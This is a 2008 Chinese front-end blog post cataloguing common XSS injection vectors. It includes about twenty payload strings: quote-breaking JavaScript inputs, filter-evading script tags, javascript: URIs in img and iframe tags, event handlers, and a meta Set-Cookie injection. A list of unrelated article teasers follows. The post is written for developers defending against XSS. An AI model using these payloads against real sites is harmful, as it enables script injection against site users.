常见的 XSS 注入攻击方式 Part.1
作者:grace 来源:gracecode.com 发布时间:2008-10-30 13:06:00
标签:xss,注入,前端,javascript
前端开发常见的安全问题就是会遭受 XSS 注入攻击,这里列举常见的代码注入方式。
Javascript 代码注入
Javascript 代码注入主要表现为直接引用未经校验的字符串、解析不安全的 JSON 数据(包括 JSONP)等。
很多时候会写这样的代码
document.write('u name is' + name);
这就会形成一定的安全性问题(如果服务器端没有过滤的话),比如 name 为下面的数据,在没有经过过滤时
';alert('xss');//
";alert('xss');//
'';!--"<xss>=&{()}
就会破坏原有代码结构,插入不期望的代码。
HTML 标签注入
HTML 注入是较为常见的一种方式,主要的注入入口为不周全的正则过滤、内联样式(针对 Exploer),下面是常见的注入代码
逃过不周全的正则过滤,解决方案为使用 PHP 的 htmlspecialchars 以及 htmlentities 等类似函数转义。
<sCrIpT src=xss.js></sCrIpT>
<script src=xss.js> </script>
<script/xss src="xss.js"></script>
<script/SRC="xss.js"></script>
<<script>alert("xss");//<</script>
<script>a=/xss/ alert(a.source)</script>
从图片标签中注入,在些论坛上比较常见
<img src="javascript:alert('xss');">
<img """><script>alert("xss")</script>">
<img src="xss.php?param">
从连接标签上注入(虽然本人没有发现过案例,不过也不能轻视)
<script a=">" SRC="xss.js"></script>
<script =">" SRC="xss.js"></script>
<script a=">" '' SRC="xss.js"></script>
其他容易注入的地方
<body onload=alert('xss')>
<iframe src="javascript:alert('xss');"></iframe>
<embed src="xss.swf" AllowScriptAccess="always"></embed>
<meta http-equiv="Set-Cookie" content="USERID=<script>alert('xss')</script>">
先摘记举例那么多,下期的内容包括“CSS 注入”、“其他注入方法”以及一般性解决方案,欢迎探讨和纠正。
0
投稿
猜你喜欢
- 2008年6月8日农历五月初五,是中国的传统节日端午节,来源于中国的春秋战国时期,至今有2000多年的历史,今年也是设为法定假日后第一个假期
- 精博的域名已经由 essentialblog.cn 改为 jingpin.org,下面介绍我是如何更换域名的。一、cPanel 上的操作:在
- 如果你的VPS上有个文件要传到另一个VPS上,最最简单的方法有两种。一个是先下载到本地,然后上传到另一个VPS,这个方法的缺点是速度慢。另一
- 我认为,把搜索引擎优化中最常发生的一些问题归纳整理出来,提供给那些想在搜索结果中取得较高排名的人作为参考,是完全有必要的。我在下面列出了搜索
- Windows操作系统的IIS是大家最常用的Web服务器之一。IIS功能强大、简单易用,但也容易受到恶意攻击,它的安全性一直是大家谈论的焦点
- 一 为什么要在国外注册域名?随便讲讲,我现在非常喜欢在国外注册域名了,我想好处应该有2个:1是价格便宜2是管理方便 过户 转出 PUSH等非
- 最近研究怎么宣传网站,也在网上找了一些资料,自己总结一下,供大家参考,小弟是新手,如果大家有好的经验,说出来也让小弟学习一下!一、选择合适的
- “XX,你又来我家偷菜,太无耻了!”“我辛辛苦苦种的玫瑰啊,你们就不能给我留点吗
- 最新消息,日前国内人气最高的非赢性互联网技术交流社区之一深度(http://bbs.deepin.org)成功升级。经过调整后的深度社区12
- “网页游戏是我们最先叫起来的”,孙文俊这样对腾讯科技说,“最初的叫法是WebGame或浏览器游戏。”孙文俊05年底创立了一个《OGame银河
- 一个网站的PR似乎是SEO至关重要的一步,很多网站从最初的PR0升到PR5,都用了半年一年甚至更多的时间。所以,新站如何快速的获得高质量的友
- 上次我们讲了proftp的基本安装,由于我们后面有关于mysql和quota的设置,所以编译的时候把相应的模块都编译进去了,如果你不需要my
- 有这样一句话:国际化就是本土化,本土化是国际化的核心。这句话虽然简单,但是却蕴含着很多道理。如果一家企业或一种产品想要打入国际市场,就一定要
- 随着QQ的普及应用,利用QQ群进行网络推广越来越受到推广人员的喜爱,应该说这是一种便于操作、成本低廉的网络推广方法,今天就让江礼坤来和大家分
- 一个正确的robots.txt文件,能让搜索引擎不抓取网站的某个不想让蜘蛛抓取的文件,也可以避免大量的复制网页对网站搜索引擎权重的影响。Ro
- 经历了近年的某些IDC服务商倒闭事件,国内IDC市场在在俯卧撑式的环境下渐趋理性和成熟,市场开始转型,业内专家认为,IDC产业经历了大起大落
- 其实,在服务器的安全设置方面,我虽然有一些经验,但是还谈不上有研究,所以我写这篇文章的时候心里很不踏实,总害怕说错了会误了别人的事。本文更侧
- 博客程序从Z-blog到WordPress的转换过程全纪录:1.前期准备网站未做,空间先找。我曾考虑过国外主机,由于有被墙的风险,访问速度也
- 完成了对Exchange Server 2003的安装,不过在安装完成之后,我们还需要对其进行一些基本的配置。今天我就给大家介绍一下如何对E
- 那么什么样的网站才算是有效的企业网站呢?首先:网站必须具有较强的盈利能力。我始终认为不能给企业带来利润的网站都是病态的。一个真正有效的企业网